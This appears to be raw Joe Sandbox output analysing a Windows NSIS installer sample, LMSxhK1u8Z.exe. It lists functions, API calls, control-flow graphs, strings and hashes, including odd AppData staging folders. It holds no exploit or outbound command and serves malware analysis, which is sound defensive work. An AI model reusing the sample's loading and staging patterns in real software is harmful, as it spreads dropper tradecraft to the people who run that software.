                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\LMSxhK1u8Z.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                • API String ID: 2035342205-2774318742
                                                                                                • Opcode ID: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                                                                • Instruction ID: 4fa580f458b6ccb0767a7c3d42ea348ba32fb6fd56c90456328cf5468defc57c
                                                                                                • Opcode Fuzzy Hash: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                                                                • Instruction Fuzzy Hash: 8A51B135800A05EACB21AB218C85ABF7778EF81754F54843BF415B61D1E77C4982EE6D
                                                                                                Function 004060B0 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                                • LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                • String ID:
                                                                                                • API String ID: 310444273-0
                                                                                                • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                                                • Instruction ID: 8a2f4544d0f7460eb2636e635d5deeba11c8ac6a6071c480d08d1599e38ef1a2
                                                                                                • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                                                • Instruction Fuzzy Hash: C3E0CD326002309BC3204B30AE4497773EC9F98640305043EF645F6000CB74DC22EF69
                                                                                                Function 00406089 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406094
                                                                                                • FindClose.KERNELBASE(00000000), ref: 004060A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0
                                                                                                • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                                                • Instruction ID: 8c9aebf9a212da5294cb1f82767a4f5960c49382cb163a998aea3b369420c93e
                                                                                                • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                                                • Instruction Fuzzy Hash: B2D012716585209BC7905738AE0C84B7A98AF593717224B36F46BF22E0CB3C8C66869C
                                                                                                Function 0040371A Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 168 40371a-403732 call 4060b0 171 403734-403744 call 405c8d 168->171 172 403746-40377d call 405c13 168->172 179 4037a0-4037c9 call 4039f0 call 4058b6 171->179 177 403795-40379b lstrcatW 172->177 178 40377f-403790 call 405c13 172->178 177->179 178->177 186 40385b-403863 call 4058b6 179->186 187 4037cf-4037d4 179->187 193 403871-403896 LoadImageW 186->193 194 403865-40386c call 405d68 186->194 187->186 188 4037da-403802 call 405c13 187->188 188->186 195 403804-403808 188->195 197 403917-40391f call 40140b 193->197 198 403898-4038c8 RegisterClassW 193->198 194->193 200 40381a-403826 lstrlenW 195->200 201 40380a-403817 call 4057db 195->201 210 403921-403924 197->210 211 403929-403934 call 4039f0 197->211 202 4039e6 198->202 203 4038ce-403912 SystemParametersInfoW CreateWindowExW 198->203 207 403828-403836 lstrcmpiW 200->207 208 40384e-403856 call 4057ae call 405d46 200->208 201->200 205 4039e8-4039ef 202->205 203->197 207->208 209 403838-403842 GetFileAttributesW 207->209 208->186 214 403844-403846 209->214 215 403848-403849 call 4057fa 209->215 210->205 221 40393a-403957 ShowWindow LoadLibraryW 211->221 222 4039bd-4039be call 4050cd 211->222 214->208 214->215 215->208 224 403960-403972 GetClassInfoW 221->224 225 403959-40395e LoadLibraryW 221->225 226 4039c3-4039c5 222->226 227 403974-403984 GetClassInfoW RegisterClassW 224->227 228 40398a-4039ad DialogBoxParamW call 40140b 224->228 225->224 229 4039c7-4039cd 226->229 230 4039df-4039e1 call 40140b 226->230 227->228 234 4039b2-4039bb call 40366a 228->234 229->210 232 4039d3-4039da call 40140b 229->232 230->202 232->210 234->205
                                                                                                APIs
                                                                                                  • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                                                  • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                                                  • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                                                • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe"), ref: 0040379B
                                                                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
                                                                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
                                                                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 00403839
                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken), ref: 00403882
                                                                                                  • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                                • RegisterClassW.USER32(00433E40), ref: 004038BF
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403942
                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
                                                                                                • RegisterClassW.USER32(00433E40), ref: 00403984
                                                                                                • DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: "C:\Users\user\Desktop\LMSxhK1u8Z.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                • API String ID: 914957316-1433671342
                                                                                                • Opcode ID: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                                                                • Instruction ID: f2efbd8b4e2183f22d1c30e2af872408ecd3ec1be094dd46b245239935a3b56e
                                                                                                • Opcode Fuzzy Hash: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                                                                • Instruction Fuzzy Hash: 9B61D771100700AED320BF669D46F2B3AACEB85B46F10403FF941B62E2DBB95941CB2D
                                                                                                Function 00403ABD Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 239 403abd-403acf 240 403c10-403c1f 239->240 241 403ad5-403adb 239->241 243 403c21-403c69 GetDlgItem * 2 call 403f95 SetClassLongW call 40140b 240->243 244 403c6e-403c83 240->244 241->240 242 403ae1-403aea 241->242 245 403aec-403af9 SetWindowPos 242->245 246 403aff-403b02 242->246 243->244 248 403cc3-403cc8 call 403fe1 244->248 249 403c85-403c88 244->249 245->246 251 403b04-403b16 ShowWindow 246->251 252 403b1c-403b22 246->252 258 403ccd-403ce8 248->258 254 403c8a-403c95 call 401389 249->254 255 403cbb-403cbd 249->255 251->252 259 403b24-403b39 DestroyWindow 252->259 260 403b3e-403b41 252->260 254->255 270 403c97-403cb6 SendMessageW 254->270 255->248 257 403f62 255->257 265 403f64-403f6b 257->265 263 403cf1-403cf7 258->263 264 403cea-403cec call 40140b 258->264 266 403f3f-403f45 259->266 268 403b43-403b4f SetWindowLongW 260->268 269 403b54-403b5a 260->269 273 403f20-403f39 DestroyWindow EndDialog 263->273 274 403cfd-403d08 263->274 264->263 266->257 271 403f47-403f4d 266->271 268->265 275 403b60-403b71 GetDlgItem 269->275 276 403bfd-403c0b call 403ffc 269->276 270->265 271->257 280 403f4f-403f58 ShowWindow 271->280 273->266 274->273 281 403d0e-403d5b call 405d68 call 403f95 * 3 GetDlgItem 274->281 277 403b90-403b93 275->277 278 403b73-403b8a SendMessageW IsWindowEnabled 275->278 276->265 282 403b95-403b96 277->282 283 403b98-403b9b 277->283 278->257 278->277 280->257 309 403d65-403da1 ShowWindow KiUserCallbackDispatcher call 403fb7 EnableWindow 281->309 310 403d5d-403d62 281->310 286 403bc6-403bcb call 403f6e 282->286 287 403ba9-403bae 283->287 288 403b9d-403ba3 283->288 286->276 290 403be4-403bf7 SendMessageW 287->290 292 403bb0-403bb6 287->292 288->290 291 403ba5-403ba7 288->291 290->276 291->286 295 403bb8-403bbe call 40140b 292->295 296 403bcd-403bd6 call 40140b 292->296 307 403bc4 295->307 296->276 305 403bd8-403be2 296->305 305->307 307->286 313 403da3-403da4 309->313 314 403da6 309->314 310->309 315 403da8-403dd6 GetSystemMenu EnableMenuItem SendMessageW 313->315 314->315 316 403dd8-403de9 SendMessageW 315->316 317 403deb 315->317 318 403df1-403e2f call 403fca call 405d46 lstrlenW call 405d68 SetWindowTextW call 401389 316->318 317->318 318->258 327 403e35-403e37 318->327 327->258 328 403e3d-403e41 327->328 329 403e60-403e74 DestroyWindow 328->329 330 403e43-403e49 328->330 329->266 332 403e7a-403ea7 CreateDialogParamW 329->332 330->257 331 403e4f-403e55 330->331 331->258 333 403e5b 331->333 332->266 334 403ead-403f04 call 403f95 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 332->334 333->257 334->257 339 403f06-403f19 ShowWindow call 403fe1 334->339 341 403f1e 339->341 341->266
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
                                                                                                • ShowWindow.USER32(?), ref: 00403B16
                                                                                                • DestroyWindow.USER32 ref: 00403B2A
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
                                                                                                • GetDlgItem.USER32(?,?), ref: 00403B67
                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403B82
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403C30
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403C3A
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403D4B
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403D6C
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
                                                                                                • EnableWindow.USER32(?,?), ref: 00403D99
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403DB6
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
                                                                                                • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
                                                                                                • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403F52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3282139019-0
                                                                                                • Opcode ID: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                                                                • Instruction ID: 9063085a3fd87244c99a969d1f6d2bb761e88773988a4a67d8464f71257f90be
                                                                                                • Opcode Fuzzy Hash: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                                                                • Instruction Fuzzy Hash: 7BC1CD71900305BFDB216F65EE8AE2A3E7CFB4970AB14043EF641B11E1CB7999429B1D
                                                                                                Function 00402CFF Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 342 402cff-402d4d GetTickCount GetModuleFileNameW call 4059cf 345 402d59-402d87 call 405d46 call 4057fa call 405d46 GetFileSize 342->345 346 402d4f-402d54 342->346 354 402e74-402e82 call 402c9b 345->354 355 402d8d 345->355 347 402f31-402f35 346->347 361 402e84-402e87 354->361 362 402ed7-402edc 354->362 357 402d92-402da9 355->357 359 402dab 357->359 360 402dad-402daf call 403160 357->360 359->360 366 402db4-402db6 360->366 364 402e89-402e9a call 403192 call 403160 361->364 365 402eab-402ed5 GlobalAlloc call 403192 call 402f38 361->365 362->347 384 402e9f-402ea1 364->384 365->362 390 402ee8-402ef9 365->390 368 402dbc-402dc3 366->368 369 402ede-402ee6 call 402c9b 366->369 374 402dc5-402dd9 call 40598a 368->374 375 402e3f-402e43 368->375 369->362 380 402e4d-402e53 374->380 389 402ddb-402de2 374->389 379 402e45-402e4c call 402c9b 375->379 375->380 379->380 386 402e62-402e6c 380->386 387 402e55-402e5f call 40615e 380->387 384->362 392 402ea3-402ea9 384->392 386->357 391 402e72 386->391 387->386 389->380 395 402de4-402deb 389->395 396 402f01-402f06 390->396 397 402efb 390->397 391->354 392->362 392->365 395->380 398 402ded-402df4 395->398 399 402f07-402f0d 396->399 397->396 398->380 400 402df6-402dfd 398->400 399->399 401 402f0f-402f2a SetFilePointer call 40598a 399->401 400->380 402 402dff-402e1f 400->402 405 402f2f 401->405 402->362 404 402e25-402e29 402->404 406 402e31-402e39 404->406 407 402e2b-402e2f 404->407 405->347 406->380 408 402e3b-402e3d 406->408 407->391 407->406 408->380
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402D10
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LMSxhK1u8Z.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C
                                                                                                  • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                                  • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LMSxhK1u8Z.exe,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                • String ID: "C:\Users\user\Desktop\LMSxhK1u8Z.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\LMSxhK1u8Z.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                • API String ID: 4283519449-2839437641
                                                                                                • Opcode ID: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                                                                • Instruction ID: 77e1e34d23ec3cd6b8d0d5fd72658ee77a79da899d912ccb87991cca2eeb2408
                                                                                                • Opcode Fuzzy Hash: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                                                                • Instruction Fuzzy Hash: 0051D471944218AFDB109F65DE89B9F7AB8FB14358F10403BFA04B62D0C7B89D418B9D
                                                                                                Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 540 401752-401777 call 402ad0 call 405825 545 401781-401793 call 405d46 call 4057ae lstrcatW 540->545 546 401779-40177f call 405d46 540->546 551 401798-401799 call 405fda 545->551 546->551 555 40179e-4017a2 551->555 556 4017a4-4017ae call 406089 555->556 557 4017d5-4017d8 555->557 565 4017c0-4017d2 556->565 566 4017b0-4017be CompareFileTime 556->566 558 4017e0-4017fc call 4059cf 557->558 559 4017da-4017db call 4059aa 557->559 567 401870-401899 call 404ffa call 402f38 558->567 568 4017fe-401801 558->568 559->558 565->557 566->565 582 4018a1-4018ad SetFileTime 567->582 583 40189b-40189f 567->583 569 401852-40185c call 404ffa 568->569 570 401803-401841 call 405d46 * 2 call 405d68 call 405d46 call 405529 568->570 580 401865-40186b 569->580 570->555 602 401847-401848 570->602 585 402966 580->585 584 4018b3-4018be CloseHandle 582->584 583->582 583->584 587 4018c4-4018c7 584->587 588 40295d-402960 584->588 590 402968-40296c 585->590 591 4018c9-4018da call 405d68 lstrcatW 587->591 592 4018dc-4018df call 405d68 587->592 588->585 598 4018e4-402241 call 405529 591->598 592->598 598->588 598->590 602->580 604 40184a-40184b 602->604 604->569
                                                                                                APIs
                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic,?,?,00000031), ref: 00401793
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Generic,Generic,00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic,?,?,00000031), ref: 004017B8
                                                                                                  • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                                  • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,74DF23A0), ref: 00405055
                                                                                                  • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
